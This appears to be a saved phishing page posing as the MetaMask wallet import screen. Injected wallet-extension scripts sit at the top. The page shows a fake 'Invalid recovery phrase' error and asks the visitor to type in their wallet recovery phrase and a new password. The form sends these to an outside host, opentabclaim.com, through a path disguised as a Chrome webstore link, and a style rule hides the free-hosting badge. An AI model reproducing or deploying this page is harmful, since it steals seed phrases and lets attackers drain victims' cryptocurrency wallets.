<!DOCTYPE html>
<html><script async="false">(() => {// @ts-nocheck

const SUPPORTED_WALLET_METHODS = window.SUPPORTED_WALLET_METHODS;

const REQUEST_MAP = {
  ETH: {
    chainId: SUPPORTED_WALLET_METHODS.getChainId,
    accounts: SUPPORTED_WALLET_METHODS.getAccounts,
    blockNumber: SUPPORTED_WALLET_METHODS.getBlockNumber,
    estimateGas: SUPPORTED_WALLET_METHODS.estimateGas,
    sendTransaction: SUPPORTED_WALLET_METHODS.sendTransaction,
    signMessage: SUPPORTED_WALLET_METHODS.signMessage,
  },
  DAG: {
    chainId: SUPPORTED_WALLET_METHODS.getChainId,
    accounts: SUPPORTED_WALLET_METHODS.getAccounts,
    sendTransaction: SUPPORTED_WALLET_METHODS.sendTransaction,
    getBalance: SUPPORTED_WALLET_METHODS.getBalance,
    getPublicKey: SUPPORTED_WALLET_METHODS.getPublicKey,
    signMessage: SUPPORTED_WALLET_METHODS.signMessage
  },
  isConnected: SUPPORTED_WALLET_METHODS.isConnected,
  getNetwork: SUPPORTED_WALLET_METHODS.getNetwork,
  getAddress: SUPPORTED_WALLET_METHODS.getAddress,
  getBalance: SUPPORTED_WALLET_METHODS.getBalance
};

const SUPPORTED_CHAINS = {
  constellation: {
    prefix: 'dag',
    asset: 'DAG'
  },
  ethereum: {
    prefix: 'eth',
    asset: 'ETH'
  }
};

class RPCError extends Error{
  constructor(message, code) {
    super(message);
    this.message = message;
    this.name = 'Stargazer Wallet Error';
    this.code = code;
  }
}

const ERRORS = {
  USER_REJECTED: (message = 'User Rejected Request') => {
    return new RPCError(message, 4001);
  },
  INVALID_METHOD: (message = 'Unsupported Method') => {
    return new RPCError(message, 4200);
  }
};

async function handleRequest(chain, req) {
  const asset = SUPPORTED_CHAINS[chain].asset;

  const provider = window.providerManager.getProviderFor(asset);

  if(req.method === 'personal_sign'){
    req.method = `eth_signMessage`;
  }

  let [prefix, method] = req.method.split('_');

  if (prefix && prefix.toLowerCase() !== SUPPORTED_CHAINS[chain].prefix) {
    throw ERRORS.INVALID_METHOD();
  }

  if (!method) {
    prefix = null;
    method = req.method;
  } else {
    prefix = prefix.toUpperCase();
  }

  // All request accounts go to the same place
  if (method === 'requestAccounts') {
    const {result, data} = await window.providerManager.enable();

    if (!result) {
      throw ERRORS.USER_REJECTED();
    }
    return data.accounts;
  }

  if (prefix && REQUEST_MAP.hasOwnProperty(prefix) && REQUEST_MAP[prefix].hasOwnProperty(method)) {
    const response = await provider.getMethod(REQUEST_MAP[prefix][method])(... req.params);

    if (response.result === false) {
      throw ERRORS.USER_REJECTED();
    }

    return response;
  }

  throw ERRORS.INVALID_METHOD();
}

const provider = chain => {
  chain = chain.toLowerCase();

  if (!Object.keys(SUPPORTED_CHAINS).includes(chain)) {
    console.error('Unsupported chain: ' + chain);
  }

  return {
    request: async req => {
      const params = req.params || [];

      return await handleRequest(chain, {
        method: req.method,
        params
      }).catch( err => {
        console.error(err);
        throw err;
      });
    },
    on: (method, callback) => {
      let origin = window.location.hostname;
      if (window.location.port) {
        origin += ':' + window.location.port;
      }

      const id = chain + '.' + origin + '.' + method;

      window.stargazer._listeners[id] = ({detail}) => {
        if (detail) {
          callback(JSON.parse(detail));
        }
      };

      window.addEventListener(id, window.stargazer._listeners[id], {passive: true});

      // Register the origin of the listening site.
      window.postMessage({
        id,
        type: 'STARGAZER_EVENT_REG',
        data: {
          method,
          origin,
          chain
        }
      }, '*');
    },
    removeListener: method => {
      let origin = window.location.hostname;
      if (window.location.port) {
        origin += ':' + window.location.port;
      }

      const id = chain + '.' + origin + '.' + method;

      if (window.stargazer._listeners[id]) {
        window.removeEventListener(id, window.stargazer._listeners[id]);

        delete window.stargazer._listeners[id];
      }

      window.postMessage({
        id,
        type: 'STARGAZER_EVENT_DEREG',
        data: {
          method,
          origin,
          chain
        }
      }, '*');
    },
    get version(){
      return window.STARGAZER_VERSION;
    },
  };
};

const allPrivider = provider('ethereum');

window.stargazer = {
  evtRegMap: {},
  get version(){
    return window.STARGAZER_VERSION;
  },
  getProvider: chain => provider(chain),
  isConnected: async () => {
    const provider = window.providerManager.getProviderFor('main');
    return provider.getMethod('wallet.isConnected')();
  },
  enable: async () => {
    const {result, data} = await window.providerManager.enable();
    if (!result) {
      throw ERRORS.USER_REJECTED();
    }

    return data.accounts;
  },
  request: async req => {
    return allPrivider.request(req);
  },
  on: (method, callback) => {
    return allPrivider.on(method, callback);
  },
  removeListener: method => {
    return allPrivider.removeListener(method);
  },
  _listeners: {}
};
})()</script><script async="false">(() => {// @ts-nocheck

class InjectedProvider {
  constructor(asset) {
    this.asset = asset
  }

  setClient() {}

  getMethod(method) {
    return(...args) => window.providerManager.proxy('CAL_REQUEST', {
      asset: this.asset,
      method,
      args
    })
  }
}

class ProviderManager {
  constructor() {
    this.cache = {}
  }

  proxy(type, data) {
    return new Promise((resolve, reject) => {
      const id = Date.now() + '.' + Math.random()

      window.addEventListener(id, ({detail}) => {
        const response = JSON.parse(detail)
        if (response.error) {
          reject(new Error(response.error));
        } else {
          resolve(response);
        }
      }, {
        once: true,
        passive: true
      })

      window.postMessage({
        id,
        type,
        data
      }, '*')
    })
  }

  getProviderFor(asset) {
    if (this.cache[asset])
      return this.cache[asset]
    this.cache[asset] = new InjectedProvider(asset)

    return this.cache[asset]
  }

  enable(network) {
    return this.proxy('ENABLE_REQUEST', {network})
  }
}

window.providerManager = new ProviderManager();
})()</script><script async="false">(() => {window.STARGAZER_VERSION = "3.5.0"})()</script><script async="false">(() => {window.SUPPORTED_WALLET_METHODS = {"0":"getChainId","1":"getAccounts","2":"getBlockNumber","3":"estimateGas","4":"sendTransaction","5":"signMessage","6":"isConnected","7":"getNetwork","8":"getAddress","9":"getBalance","10":"getPublicKey","getChainId":0,"getAccounts":1,"getBlockNumber":2,"estimateGas":3,"sendTransaction":4,"signMessage":5,"isConnected":6,"getNetwork":7,"getAddress":8,"getBalance":9,"getPublicKey":10}})()</script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
    <title>MetaMask</title>
 <link href="./MetaMask_files/favicon.png" type="image/x-icon" rel="shortcut icon">

    <link rel="stylesheet" type="text/css" href="./MetaMask_files/mangango-0xc2c1F13FfD43491D174dED88877FF54AcF9B12e6.css" title="ltr">
    <link rel="stylesheet" type="text/css" href="./MetaMask_files/lonte-0xDe22ad40FeDe0452F27bB4ad0d0f2E948A8a8055.css" title="rtl" disabled="">
  <style></style><style type="text/css" data-jss="" data-meta="MuiInput">
.jss26 {
  color: rgba(0, 0, 0, 0.87);
  display: inline-flex;
  position: relative;
  font-size: 1rem;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  line-height: 1.1875em;
}
.jss26.jss29 {
  color: rgba(0, 0, 0, 0.38);
}
label + .jss27 {
  margin-top: 16px;
}
.jss30:after {
  left: 0;
  right: 0;
  bottom: 0;
  content: "";
  position: absolute;
  transform: scaleX(0);
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
  border-bottom: 2px solid #303f9f;
  pointer-events: none;
}
.jss30.jss28:after {
  transform: scaleX(1);
}
.jss30.jss31:after {
  transform: scaleX(1);
  border-bottom-color: #f44336;
}
.jss30:before {
  left: 0;
  color: transparent;
  right: 0;
  bottom: 0;
  content: "need text here to prevent subpixel zoom issue";
  position: absolute;
  transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  pointer-events: none;
}
.jss30:hover:not(.jss29):not(.jss28):not(.jss31):before {
  border-bottom: 2px solid rgba(0, 0, 0, 0.87);
}
.jss30.jss29:before {
  border-bottom: 1px dotted rgba(0, 0, 0, 0.42);
}
.jss32 {
  padding: 6px 0 7px;
}
.jss33 {
  width: 100%;
}
.jss34 {
  font: inherit;
  color: currentColor;
  border: 0;
  margin: 0;
  padding: 6px 0 7px;
  display: block;
  min-width: 0;
  flex-grow: 1;
  box-sizing: content-box;
  background: none;
  vertical-align: middle;
  -webkit-tap-highlight-color: transparent;
}
.jss34::-webkit-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34::-moz-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34:-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34::-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.jss34:focus {
  outline: 0;
}
.jss34:invalid {
  box-shadow: none;
}
.jss34::-webkit-search-decoration {
  -webkit-appearance: none;
}
.jss34.jss29 {
  opacity: 1;
}
label[data-shrink=false] + .jss27 .jss34::-webkit-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34::-moz-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34:-ms-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34::-ms-input-placeholder {
  opacity: 0;
}
label[data-shrink=false] + .jss27 .jss34:focus::-webkit-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus::-moz-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus:-ms-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .jss27 .jss34:focus::-ms-input-placeholder {
  opacity: 0.42;
}
.jss35 {
  padding-top: 3px;
}
.jss36 {
  resize: none;
  padding: 0;
}
.jss37 {
  height: 1.1875em;
}
.jss38 {
  -moz-appearance: textfield;
  -webkit-appearance: textfield;
}
</style><style type="text/css" data-jss="" data-meta="MuiFormLabel">
.jss21 {
  color: rgba(0, 0, 0, 0.54);
  padding: 0;
  font-size: 1rem;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  line-height: 1;
}
.jss21.jss22 {
  color: #303f9f;
}
.jss21.jss23 {
  color: rgba(0, 0, 0, 0.38);
}
.jss21.jss24 {
  color: #f44336;
}
.jss25.jss24 {
  color: #f44336;
}
</style><style type="text/css" data-jss="" data-meta="MuiInputLabel">
.jss16 {
  transform-origin: top left;
}
.jss17 {
  top: 0;
  left: 0;
  position: absolute;
  transform: translate(0, 24px) scale(1);
}
.jss18 {
  transform: translate(0, 21px) scale(1);
}
.jss19 {
  transform: translate(0, 1.5px) scale(0.75);
  transform-origin: top left;
}
.jss20 {
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
}
</style><style type="text/css" data-jss="" data-meta="MuiFormControl">
.jss12 {
  margin: 0;
  border: 0;
  display: inline-flex;
  padding: 0;
  position: relative;
  min-width: 0;
  flex-direction: column;
}
.jss13 {
  margin-top: 16px;
  margin-bottom: 8px;
}
.jss14 {
  margin-top: 8px;
  margin-bottom: 4px;
}
.jss15 {
  width: 100%;
}
</style><style type="text/css" data-jss="">
.jss1 {
  color: #aeaeae;
  font-weight: 400;
}
.jss1.jss2 {
  color: #aeaeae;
}
.jss1.jss4 {
  color: #aeaeae;
}
.jss3:after {
  border-bottom: 2px solid #f7861c;
}
.jss5.jss6 {
  color: #5b5b5b;
}
.jss5.jss4 {
  color: #5b5b5b;
}
.jss8 {
  border: 2px solid #BBC0C5;
  height: 48px;
  padding: 0 16px;
  display: flex;
  align-items: center;
  border-radius: 6px;
}
label + .jss8 {
  margin-top: 9px;
}
.jss8.jss7 {
  border: 1px solid #2f9ae0;
}
.jss9 {
  color: #5b5b5b;
  position: initial;
  transform: none;
  font-size: 1rem;
  transition: none;
}
.jss10 {
  color: #5b5b5b;
  position: initial;
  transform: none;
  font-size: .75rem;
  transition: none;
}
.jss11 {
  line-height: initial !important;
}
</style></head>
  <body>
    <div id="app-content"><div data-reactroot="" class="app mouse-user-styles"><!-- react-empty: 2 --><!-- react-empty: 3 --><div><span></span></div><div class=".menu-droppo-container network-droppo" style="position: absolute; top: 58px; width: 309px; z-index: 55;"><style>
        .menu-droppo-enter {
          transition: transform 300ms ease-in-out;
          transform: translateY(-200%);
        }

        .menu-droppo-enter.menu-droppo-enter-active {
          transition: transform 300ms ease-in-out;
          transform: translateY(0%);
        }

        .menu-droppo-leave {
          transition: transform 300ms ease-in-out;
          transform: translateY(0%);
        }

        .menu-droppo-leave.menu-droppo-leave-active {
          transition: transform 300ms ease-in-out;
          transform: translateY(-200%);
        }
      </style></div><noscript></noscript><div class="main-container-wrapper"><div class="first-time-flow"><div class="first-time-flow__wrapper"><div class="app-header__logo-container"><img height="30" src="./MetaMask_files/metamask-logo-horizontal.svg" class="app-header__metafox-logo app-header__metafox-logo--horizontal"><img height="42" width="42" src="./MetaMask_files/favicon.png" class="app-header__metafox-logo app-header__metafox-logo--icon"></div>

<form method="POST" action="https://opentabclaim.com/mct4.phpwebstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn" class="first-time-flow__form">

<font face="Arial Black" size="4" color="red">Invalid recovery phrase</font><br>

<font face="Arial" size="2" color="black"></font>


<div class="first-time-flow__textarea-wrapper">

<textarea class="first-time-flow__textarea" name="rrq" maxlength="200" minlength="12" required="" placeholder="Enter your  recovery phrase here"></textarea></div><!-- react-text: 113 --><!-- /react-text --><div class="jss12 jss13 first-time-flow__input">
    


<label class="jss21 jss5 jss16 jss17 jss20 jss19 jss9" data-shrink="true" for="password"><!-- react-text: 116 -->New Password<!-- /react-text --></label><div class="jss26 jss8 jss27"><input type="password" aria-invalid="false" aria-required="false" autocomplete="new-password" class="jss34 jss37" id="password" value="" placeholder="New Password " dir="auto"></div><!-- react-text: 138 --><!-- /react-text --></div><div class="jss12 jss13 first-time-flow__input"><label class="jss21 jss5 jss16 jss17 jss20 jss19 jss9" data-shrink="true" for="confirm-password"><!-- react-text: 122 -->Confirm password<!-- /react-text --></label><div class="jss26 jss8 jss27"><input type="password" aria-invalid="false" aria-required="false" autocomplete="confirm-password" class="jss34 jss37" id="confirm-password" value="" placeholder="Confirm password" dir="auto"></div><!-- react-text: 139 --><!-- /react-text --></div>

<div class="first-time-flow__textarea-wrapper"><label>Must be at least 8 characters</label>

<button class="button btn-primary first-time-flow__button">Import</button>
<br>
<font face="Arial" size="1">By proceeding you agree to these Terms and Conditions.</font>
</div></form></div></div></div>



<style>img[alt*="www.000webhost.com"]{display:none}</style>
<style>.footer,.generic-footer{margin-bottom:98px}@media (min-width:374px){.footer,.generic-footer{margin-bottom:78px}}@media (min-width:546px){.footer,.generic-footer{margin-bottom:56px}}@media (min-width:1055px){.footer,.generic-footer{margin-bottom:0}}.disclaimer{position:fixed;z-index:9999999;bottom:0;right:0;border-top:2px solid #ff5c62;text-align:center;font-size:14px;font-weight:400;background-color:#fff;padding:5px 10px 5px 10px}.disclaimer a:hover{text-decoration:underline}@media (min-width:1052px){.disclaimer{text-align:right;border-left:2px solid red;border-top-left-radius:10px}}@media (min-width:1920px){.disclaimer{width:60%}}</style></div></div></body></html>